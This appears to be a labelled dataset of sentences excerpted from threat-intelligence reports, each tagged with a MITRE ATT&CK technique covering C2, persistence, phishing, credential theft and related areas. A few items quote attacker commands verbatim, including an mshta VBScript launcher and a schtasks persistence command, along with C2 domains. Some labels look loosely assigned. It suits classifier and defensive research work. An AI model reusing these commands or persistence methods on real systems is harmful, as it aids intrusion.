{"text1":"Domains  http:\/\/mdzz2019.noip[.]cn:19931 http:\/\/mdzz2019.noip[.]cn:3654\/  From my analyses, I was able to identify http:\/\/mdzz2019.noip[.]cn:19931 as its main C2 url.\u00a0 This is a dynamic DNS, meaning the actual IP changes quite frequently","labels":"['T1071']"}
{"text1":"The Trojan uses HTTP POST requests, as seen in Figure 1 to send data to the C2 server, and GET requests to receive commands from the server, as seen in Figure 2","labels":"['T1071']"}
{"text1":"Figure 1 XAgent macOS HTTP POST request  Figure 2 XAgent mscOS HTTP GET request The C2 URLs generated by XAgentOSX are very similar to those created by its Windows-based counterpart","labels":"['T1071']"}
{"text1":"Figure 3 Hardware ID used by XAgent to uniquely identify compromised hosts When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value","labels":"['T1071']"}
{"text1":"it operates over DNS traffic, but can also switch to encrypted channels such as HTTPS or SSL","labels":"['T1071']"}
{"text1":"HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP","labels":"['T1071']"}
{"text1":"Persistence is maintained through a Run registry key","labels":"['T1547.001']"}
{"text1":"This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user:  C:\\Documents and Settings\\<username>\\Start Menu\\Programs\\Startup\\viso.exe  This step establishes the persistence of the malware across reboots on the endpoint Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint  The malware might perform this activity for a couple of reasons:  Establish persistence for itself on the endpoint Establish persistence of another component of the malware on the endpoint Update itself on endpoint after a separate updater component downloads the update from the control server  The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware","labels":"['T1547.001']"}
{"text1":"The two variants of MPK share the same registry key that the Trojan uses to automatically run each time the system starts, specifically: [HKLM and HKCU]\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\explorer Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file","labels":"['T1547.001']"}
{"text1":"The RunAtLoad key will command launchd to run the daemon when the operating system starts up, while the KeepAlive key will command launchd to let the process run indefinitely","labels":"['T1547.001']"}
{"text1":"Once the user clicks on the fake Adobe Flash Player installer, it will extract\/create the following malicious payload into the Startup directory to maintain its persistence:","labels":"['T1547.001']"}
{"text1":"Register the RUN key in the registry below, so that the VBS file is executed every time the machine starts","labels":"['T1547.001']"}
{"text1":"A new registry entry is created at HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics with a value of \u201cC:\\ ProgramData \\ Initech \\Initech.exe\u201d \/run.","labels":"['T1547.001']"}
{"text1":"When each file is encrypted, registry keys are created under HKU\\{SID}\\Software\\Microsoft\\ RestartManager \\ which are used to track metadata pertaining to the file being encrypted, such as owner, sequence, session and file hash","labels":"['T1547.001']"}
{"text1":"When the .lnk file is initialized, it spawns a CMD process","labels":"['T1547.009']"}
{"text1":"We have covered recent FIN7 activity in previous public blog posts:   FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings  FIN7 Evolution and the Phishing LNK  To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence  The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity","labels":"['T1547.009']"}
{"text1":"The .zip archive attached to the email contains a Windows shortcut (.lnk) file with the Microsoft Internet Explorer logo","labels":"['T1547.009']"}
{"text1":"Clicking on the shortcut ultimately leads to Backdoor.Pirpi being downloaded and executed on the affected computer","labels":"['T1547.009']"}
{"text1":"Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path","labels":"['T1547.009']"}
{"text1":"Additionally, in the event Kaspersky is detected, the malware will immediately run the \u2018Conime.lnk\u2019 shortcut file in a new process after it is created","labels":"['T1547.009']"}
{"text1":"This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim","labels":"['T1547.009']"}
{"text1":"In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique","labels":"['T1547.009']"}
{"text1":"This spawns the hidden embedded malicious LNK file in the document","labels":"['T1547.009']"}
{"text1":"Figure 3: FIN7 phishing lure persistence mechanisms Examining Attacker Shortcut Files In many cases, attacker-created LNK files can reveal valuable information about the attacker\u2019s development environment","labels":"['T1547.009']"}
{"text1":"These files can be parsed with lnk-parser to extract all contents","labels":"['T1547.009']"}
{"text1":"LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address","labels":"['T1547.009']"}
{"text1":"The LNK file is finally used to identify a third file: a ZIP file","labels":"['T1547.009']"}
{"text1":"The LNK file is moved to the startup directory","labels":"['T1547.009']"}
{"text1":"This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file","labels":"['T1547.009']"}
{"text1":"Finally, Reaver.v1 will execute the \u2018~WUpdate.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file","labels":"['T1547.009']"}
{"text1":"Finally, Reaver.v2 will execute the \u2018~Update.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file","labels":"['T1547.009']"}
{"text1":"This shortcut file calls the built-in \u2018control.exe\u2019 utility to in turn load the previously dropped malicious CPL file of \u2018winhelp.cpl\u2019","labels":"['T1547.009']"}
{"text1":"The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier","labels":"['T1547.009']"}
{"text1":"Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence","labels":"['T1547.009']"}
{"text1":"2 Successful payload download Astaroth\u2019s initial payload is a malicious .lnk file, a common delivery method used by threat actors","labels":"['T1547.009']"}
{"text1":"Malicious .lnk files contain a link to a URL (instead of the expected local URI) to grab the next payload","labels":"['T1547.009']"}
{"text1":"In the case of Astaroth trojan, the .lnk file contains an argument into WMIC.exe to run in non-interactive mode, which forgoes opening a window that the victim could notice, to download the hardcoded url in the .lnk","labels":"['T1547.009']"}
{"text1":"Encoded Payload   Decoded Payload     MD5   Size   Import Hash   Exported Function   Version    aa3f303c3319b14b4829fe2faa5999c1  322164  182ee99b4f0803628c30411b1faa9992  l7MF25T96n45qOGWX  5.3.2    126067d634d94c45084cbe1d9873d895  330804  5f45532f947501cf024d84c36e3a19a1  hJvTJcdAU3mNkuvGGq7L  5.4.1    fce54b4886cac5c61eda1e7605483ca3  345812  c1942a0ca397b627019dace26eca78d8  WcuH  5.4.1    Table 2: Static characteristics of UPPERCUT Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server","labels":"['T1132']"}
{"text1":"Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication","labels":"['T1132']"}
{"text1":"The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform","labels":"['T1132']"}
{"text1":"The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands:  Commands received from the control server are encoded DWORDs After decoding, these DWORDs should be in the range 123459h to 123490h  Malware checking to make sure a received command is in the correct range","labels":"['T1132']"}
{"text1":"If the size is 7 bytes or more, the backdoor verifies that the command and control server sent an encoded package","labels":"['T1132']"}
{"text1":"The generated buffer is encoded using the BASE64 alphabet to be sent in the POST request","labels":"['T1132']"}
{"text1":"In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12)","labels":"['T1132']"}
{"text1":"Data that is sent is compressed and then base64-encoded before being included in the requests","labels":"['T1132']"}
{"text1":"The C2 server sends back Base64 encoded response","labels":"['T1132']"}
{"text1":"The script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs in the following format: \u00a0 <domain>\\<username>:pass \u00a0 The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, \/ and +) from the data and replaces them with domain safe values (01, 02 and 03 respectively)","labels":"['T1132']"}
{"text1":"A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration","labels":"['T1132']"}
{"text1":"Note: CTU researchers frequently observe threat actors renaming archiving tools and storing data for exfiltration in uncommon directories","labels":"['T1132']"}
{"text1":"Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file.","labels":"['T1132']"}
{"text1":"The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic, poisoning the NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.\u00a0 APT28 Uses Malicious Document to Target Hospitality Industry FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry, including hotels in at least seven European countries and one Middle Eastern country in early July","labels":"['T1598.002']"}
{"text1":"Malware Delivery Method  In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload","labels":"['T1598.002']"}
{"text1":"Figure 1: Contents of the Email A review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past","labels":"['T1598.002']"}
{"text1":"In at least some of these recent attacks, Buckeye used spear-phishing emails with a malicious .zip attachment","labels":"['T1598.002']"}
{"text1":"Looking at earlier attacks between 2013 and 2016, we believe Comnie was also used in targeted attacks against the following individuals or organizations:  Taiwan government IT service vendor in Asia Journalist of a Tibetan radio station   Figure 6 Email sent to Journalist of Tibetan radio station \u00a0 Malicious Macros The malicious macro documents used to deliver Comnie initially hide the content inside and requests that the user enables macros prior to viewing the document","labels":"['T1598.002']"}
{"text1":"APT32 actors continue to deliver the malicious attachments via spear-phishing emails","labels":"['T1598.002']"}
{"text1":"The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server","labels":"['T1598.002']"}
{"text1":"The attack involved a spear-phishing email with a subject of \u201cProject Offer\u201d and a malicious Word document (SHA256: d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318) as an attachment","labels":"['T1598.002']"}
{"text1":"Phishing emails with political themes were used in the majority of the observed attack emails","labels":"['T1598.002']"}
{"text1":"Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document","labels":"['T1598.002']"}
{"text1":"Figure 2: Excerpt of an APT33 malicious .hta file We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016","labels":"['T1598.002']"}
{"text1":"The spear phishing emails and attached malicious macro documents typically have geopolitical themes","labels":"['T1598.002']"}
{"text1":"The attackers used spear phishing emails combined with malicious HWP documents created using Hancom Hangul Office Suite","labels":"['T1598.002']"}
{"text1":"We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.A second email contained a story about a person called 'Ewing Kim' who was looking for help:The email's attachments are two different HWP documents, both leveraging same vulnerability (CVE-2013-0808)","labels":"['T1598.002']"}
{"text1":"This campaign began with a handful of spear phishing emails to South Korean targets and containing malicious attachments","labels":"['T1598.002']"}
{"text1":"Another interesting characteristic of the malicious documents is that the metadata associated with the document files themselves also matches that found in many of the malicious documents that were previously being used to spread Remcos.Figure 3: Document metadataAdditionally, the creation and modification dates associated with these documents are shortly after we released a detailed analysis of Remcos distribution campaigns that were being observed throughout 2018","labels":"['T1598.002']"}
{"text1":"In May 2016, we\u00a0published\u00a0a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware","labels":"['T1598.002']"}
{"text1":"Analysis APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization","labels":"['T1598.002']"}
{"text1":"This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy)","labels":"['T1598.002']"}
{"text1":"In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment","labels":"['T1598.002']"}
{"text1":"In contrast to the two samples used in these attacks, this one did not use a PE attachment, and instead used a Microsoft Word document containing a malicious macro as the delivery vehicle","labels":"['T1598.002']"}
{"text1":"The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars","labels":"['T1598.002']"}
{"text1":"Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments","labels":"['T1598.002']"}
{"text1":"Malicious Document   Decoy Document  The attack starts with a spear-phishing email containing the HWP document named \"\ubbf8\ubd81 \uc815\uc0c1\ud68c\ub2f4 \uc804\ub9dd \ubc0f \ub300\ube44.hwp\" (Prospects for US-North Korea Summit .hwp)","labels":"['T1598.002']"}
{"text1":"Delivery TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments","labels":"['T1598.002']"}
{"text1":"The case we found arrived through a targeted email that contained a document file (in docx format).","labels":"['T1598.002']"}
{"text1":"APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets.","labels":"['T1598.002']"}
{"text1":"Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3","labels":"['T1204']"}
{"text1":"Successful execution of the macro within the malicious document results in the installation of APT28\u2019s signature GAMEFISH malware","labels":"['T1204']"}
{"text1":"Once the user enables macros, the macro will perform the following actions:  Displays decoy content Checks for the existence of a file at %APPDATA%\\wscript.exe If %APPDATA%\\wscript.exe does not exist, the macro converts an embedded hex-encoded string into bytes and saves this data to the %APPDATA%\\wscript.exe","labels":"['T1204']"}
{"text1":"None of the known documents contain a lure image or message to instruct the recipient to click the Enable Content button necessary to run the macro, as seen in Figure 1","labels":"['T1204']"}
{"text1":"Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents The malicious LNK launches \u201cmshta.exe\u201d with the following arguments passed to it: vbscript:Execute(\"On Error Resume Next:set w=GetObject(,\"\"Word.Application\"\"):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close\") The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2","labels":"['T1204']"}
{"text1":"Malicious processes are marked red (click image to enlarge):  The following malicious files are dropped and run:  C:\\ProgramData\\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\\OFFLINE\\9A189DFE\\C7B7C186\\main.vbs dcac79d7dc4365c6d742a49244e81fd0 C:\\Users\\Public\\Libraries\\RecordedTV\\DnE.ps1 7fe0cb5edc11861bc4313a6b04aeedb2 C:\\Users\\Public\\Libraries\\RecordedTV\\DnS.ps1 3920c11797ed7d489ca2a40201c66dd4 \u201cC:\\Windows\\System32\\schtasks.exe\u201d \/create \/F \/sc minute \/mo 3 \/tn \u201cGoogleUpdateTasksMachineUI\u201d \/tr C:\\Users\\Public\\Libraries\\RecordedTV\\backup.vbs 7528c387f853d96420cf7e20f2ad1d32  Command and control server is located in the following domain: tecsupport[.]in A detailed analysis of the malware is provided in two\u00a0posts by Palo Alto networks and in a post\u00a0by FireEye, which\u00a0wrote about previous campaigns by this threat agent","labels":"['T1204']"}
{"text1":"This document was a decoy aimed to entice the user to open malicious documents embedded further down the pageThe actor embedded two additional links and the document urged the user to click on these links for more information about New Year's activities in North Korea","labels":"['T1204']"}
{"text1":"Email attacks often use \u201cclick-worthy\u201d or interesting topics to convince users to click links or open attachments that could lead to various threats","labels":"['T1204']"}
{"text1":"Users are advised to avoid opening attachments and click links on unsolicited emails","labels":"['T1204']"}
{"text1":"These Honeybee documents did not contain any specific lures, rather variations of a \u201cnot compatible\u201d message attempting to convince the user to enable content","labels":"['T1204']"}
{"text1":"Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves.Figure 2: Example malicious Excel documentSimilar to the technique described in our previous blog about Remcos, the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents","labels":"['T1204']"}
{"text1":"By default, Excel does not allow the download of data from the remote server, but will ask for the user\u2019s consent by presenting the dialog box in Figure 2:  Figure 2 Excel security notice for .iqy files By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file","labels":"['T1204']"}
{"text1":"The document also contained a lure image, similar to ones commonly found in malicious macro documents which ask the user to click on \u201cEnable Content\u201d as seen in Figure 2","labels":"['T1204']"}
{"text1":"Message 3:    Headers Received: by mailcenter.support   Sender Mercator Institute for China Studies <publications@mericcs.org>   Subject Authoritarian advance Responding to Chinas growing political influence in Europe   Body Content and images included within the e-mail body were a direct copy of the following MERICS report:  https:\/\/www.merics.org\/sites\/default\/files\/2018-02\/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf   Notes The hyperlinked text Click here to download the report within the e-mail body lead to a malicious RTF document located at the URL hxxp:\/\/www.mericcs.org\/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc","labels":"['T1204']"}
{"text1":"By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious\u2019 codes small footprint can help enable evasion of automated detection mechanisms based on macro content","labels":"['T1204']"}
{"text1":"In March, we came across an email with a malware attachment that used the Gamaredon group\u2019s tactics.","labels":"['T1204']"}
{"text1":"Once a user has double-clicked the embedded image, the form executes a VB setup script","labels":"['T1204']"}
{"text1":"The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules. Once the document was opened, it prompted the user to enable the macro titled \"BlackWater.bas\".","labels":"['T1204']"}
{"text1":"The version used here is version 4.1 digitally signed by Notepad++, as shown in Figure 5","labels":"['T1553.002']"}
{"text1":"By using this technique, the malware is able to leverage itself from a signed and verified legitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified security product process","labels":"['T1553.002']"}
{"text1":"FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads","labels":"['T1553.002']"}
{"text1":"In these websites they hosted malware that was digitally signed\u00a0with a valid, likely stolen code signing certificate Based on VirusTotal uploads, malicious documents content, and known victims \u2013 other targeted organisations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon","labels":"['T1553.002']"}
{"text1":"Digitally signed malware The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by Symantec to AI Squared, a legitimate software company that develops accessibility software:  Thumbprint: F340C0D841F9D99DBC289151C13391000366631C Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09 Another Helminth sample,\u00a01c23b3f11f933d98febfd5a92eb5c715, was signed with a different AI Squared code signing certificate: Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48 This suggest that the attackers had got a hold of an Ai Squared signing key, potentially after compromising their network","labels":"['T1553.002']"}
{"text1":"They combine reconnaissance of GPO (Group Policy Object management for execution) with digitally-signed malware to avoid detection or blocking during their infection phases","labels":"['T1553.002']"}
{"text1":"Stolen code signing certificates used to sign malware","labels":"['T1553.002']"}
{"text1":"Many of this APT\u2019s components are signed with phony Intel and AMD digital certificates","labels":"['T1553.002']"}
{"text1":"Based upon the instructional guide and the provided tools, this package appears consistent with the methodologies FireEye outlined in their research on how these attacks were executed, including specific details such as the use of ICAP via a proxy passthrough, in this case specifically squid, and using certbot to create a Let\u2019s Encrypt SSL certificate","labels":"['T1573']"}
{"text1":"The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult","labels":"['T1573']"}
{"text1":"Encrypting communications using AES and RSA public key cryptography   5","labels":"['T1573']"}
{"text1":"Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters","labels":"['T1573']"}
{"text1":"Figure 19.\u00a0Scrambling \u2018Mac OSX 10.12\u2019  Encryption  The scrambled byte sequence is passed onto the constructor of the class Packet::Packet, which creates a random AES256 key and encrypts the buffer with this key","labels":"['T1573']"}
{"text1":"It first grabs an encrypted blob stored away in a global variable and pulls out 381 bytes of this encrypted data:  The standard win32 api CryptDecrypt uses rc4 to decrypt this blob into a hardcoded c2, url path, and url parameters listed below with a simple 140-bit key \u201c\\x8B\\xFF\\x55\\x8B\\xEC\\x83\\xEC\\x50\\xA1\\x84\\x18\\x03\\x68\\x33\\xC9\\x66\\xF7\\x45\\x10\\xE8\\x1F\\x89\\x45\\xFC\\x8B\\x45\\x14\\x56\u2033","labels":"['T1573']"}
{"text1":"These appeared to be hosted on either Linode or Google Cloud, with a preference for using the ASN AS63949","labels":"['T1102']"}
{"text1":"Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection","labels":"['T1102']"}
{"text1":"In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process","labels":"['T1102']"}
{"text1":"Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications","labels":"['T1102']"}
{"text1":"This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT","labels":"['T1102']"}
{"text1":"BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure","labels":"['T1102']"}
{"text1":"LOWBALL abuses the Dropbox cloud storage service for command and control (CnC)","labels":"['T1102']"}
{"text1":"The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3] A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis The threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5] The group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China","labels":"['T1102']"}
{"text1":"Firstly, the Trojan will use the following regular expression to determine if the C2 server wishes to cancel the C2 communications:       216.58.192.174|2a00:1450:4001:81a::200e|2200::|download.microsoft.com|ntservicepack.microsoft.com|windowsupdate.microsoft.com|update.microsoft.com     Additionally, the RogueRobin Trojan uses the regular expressions in Table 3 to confirm that the DNS response contains the appropriate data for it to extract information from","labels":"['T1102']"}
{"text1":"The string is formatted as \u201c<domain list>|<minimum query size>|<maximum query size>|<hasGarbage>|<sleepPerRequest>|<maximum requests>|<query types>|<hibridMode>|<current query mode>\u201d   ^slp Sets the sleep and jitter values   ^exit Exits the Trojan    Table 5 Commands available within the C# variant of RogueRobin Using Google Drive for C2 A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode","labels":"['T1102']"}
{"text1":"This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API","labels":"['T1102']"}
{"text1":"To use Google Drive, the x_mode command received from the C2 server via DNS tunneling will be followed by a newline-delimited list of settings needed to interact with the Google Drive account","labels":"['T1102']"}
{"text1":"Figure 4 x_mode command and new line delimited settings As seen in Figure 4, the settings are stored in variables seen in Table 6, which are used to authenticate to the actor-controlled Google account before uploading and downloading files from Google Drive","labels":"['T1102']"}
{"text1":"Figure 6 Hardcoded Google Drive URL used in RogueRobin sample When the modification_time for the first file changes, the Trojan downloads the contents from the first file uploaded to the Google Drive","labels":"['T1102']"}
{"text1":"To get a job from the Google Drive account, the Trojan starts by creating a string that has the following structure with each element within the subdomain subjected to the number to character substitution from Table 4: c<unique identifier><job identifier padded with \u20180\u2019 to make three digits><sequence number>c.<C2 domain> The Trojan will then obtain an OAUTH access token to the Google Drive in the same manner as before when obtaining the unique identifier","labels":"['T1102']"}
{"text1":"Lastly, the new variant of RogueRobin is capable of using the Google Drive cloud service for its C2 channel, suggesting that DarkHydrus may be shifting to abusing legitimate cloud services for their infrastructure","labels":"['T1102']"}
{"text1":"The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com","labels":"['T1102']"}
{"text1":"Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server","labels":"['T1102']"}
{"text1":"However, the attacks different stages were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat","labels":"['T1102']"}
{"text1":"The command index table and command handler address table.\u00a0 Implant Capabilities Based on the responses received from the control server, the malware can carry out the following malicious tasks:  Recursively generate a list of files in a directory and send to the control server Terminate a specific process","labels":"['T1102']"}
{"text1":"The actor has the following demonstrated capabilities:To include exploits (for Hangul and Microsoft Office) in its workflows.To modify its campaigns by splitting the payload in to multiple stages To use compromised web servers or legitimate cloud based platforms","labels":"['T1102']"}
{"text1":"Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire","labels":"['T1102']"}
{"text1":"The majority of documents used the name \u201cgerry knight\u201d for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names","labels":"['T1102']"}
{"text1":"This tactic uses public web services to host content that contains encoded commands that are decoded by the malware","labels":"['T1102']"}
{"text1":"This can be seen in the following images taken from hxxp:\/\/ feeds.rapidfeeds[.]com\/88604\/, which is one of the dead drop resolvers we encountered in this sample:  Figure 7 Dead drop resolver used by BADNEWS \u00a0 In order to decrypt this data, the authors have included additional steps from previous versions","labels":"['T1102']"}
{"text1":"Some of the targeted apps\u00a0were:  \u00a0 Whatsapp  YouTube Video\u00a0Downloader  Google\u00a0Update \u00a0 Instagram  Hack\u00a0Wifi \u00a0 AirDroid \u00a0 WifiHacker   \u00a0 Facebook \u00a0 Photoshop \u00a0 SkyTV   \u00a0 Hotstar  Trump\u00a0Dash \u00a0 PokemonGo  With many more to\u00a0come","labels":"['T1102']"}
{"text1":"Receiving C2 instructions from user profiles created by the adversary on legitimate websites\/forums such as Github and Microsoft's TechNet portal","labels":"['T1102']"}
{"text1":"An increasingly popular tactic by threat actors is to use legitimate hosting services like Google Cloud or CloudFlare for their payload and C2\u00a0 infrastructure, making it much more difficult to safely block IPs","labels":"['T1102']"}
{"text1":"Hidden Content The primary command and control location used in this campaign is hosted on a blog on blogspot[.]com, which enables the threat actors to hide their malicious content behind a legitimate service","labels":"['T1102']"}
{"text1":"In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps:\/\/pastebin[.]com","labels":"['T1102']"}
{"text1":"five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service","labels":"['T1102']"}
{"text1":"Additional tools were recovered during the incident, including a network scanning\/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as 'spwebmember'","labels":"['T1018']"}
{"text1":"Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks.\u00a0No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim\u2019s network via credentials likely stolen from a hotel Wi-Fi network.\u00a0 Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder","labels":"['T1018']"}
{"text1":"At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:   Information Gathering: Conducted research into an organization\u2019s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions","labels":"['T1018']"}
{"text1":"Host enumeration and lateral movement After gaining an initial foothold in a compromised environment, the threat actors quickly identify and explore accessible systems","labels":"['T1018']"}
{"text1":"In one example, BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance, including domain enumeration and network state, via ipconfig, net use, net user, and net view commands","labels":"['T1018']"}
{"text1":"This technique allows them to map network resources and make lateral movements inside the network, landing in the perfect machine to match the attacker\u2019s interest","labels":"['T1018']"}
{"text1":"APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets","labels":"['T1003']"}
{"text1":"During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump","labels":"['T1003']"}
{"text1":"APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper\/cracker used alongside the AIRBREAK and BADFLICK backdoors","labels":"['T1003']"}
{"text1":"The datasets included:  Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Script to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems  We analyzed each type of dataset other than the documents containing detailed information on alleged OilRig operators and they remain consistent with previously observed OilRig tactics, techniques, and procedures (TTPs)","labels":"['T1003']"}
{"text1":"In total, nearly 13,000 sets of credentials are included in the data dump","labels":"['T1003']"}
{"text1":"It appears to us that one organization had its entire Active Directory dumped out, making up most of the credentials we found in the data dump","labels":"['T1003']"}
{"text1":"Assuming the lists of credentials are valid, the mass collection confirms our hypothesis that the OilRig group maintains a heavy emphasis on credential based attacks along with the other types of attacks they deploy","labels":"['T1003']"}
{"text1":"When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials","labels":"['T1003']"}
{"text1":"Credential Harvesting Attack On June 24, 2018, Unit 42 observed DarkHydrus carrying out a credential harvesting attack on an educational institution in the Middle East","labels":"['T1003']"}
{"text1":"Figure 2 Employee survey displayed after credential theft The November 2017 document displays a password handover document after credential theft occurs, as seen in Figure 3","labels":"['T1003']"}
{"text1":"Figure 3 Password handover form displayed after credential theft The infrastructure used in these credential harvesting attacks used the domain 0utl00k[.]net, which at the time of the attacks resolved to 107.175.150[.]113 and 195.154.41[.]150","labels":"['T1003']"}
{"text1":"Figure 6 Authentication dialog box with fake credentials entered On the C2 server, we observed Phishery receiving the inbound request and capturing the credentials, as seen in Figure 7","labels":"['T1003']"}
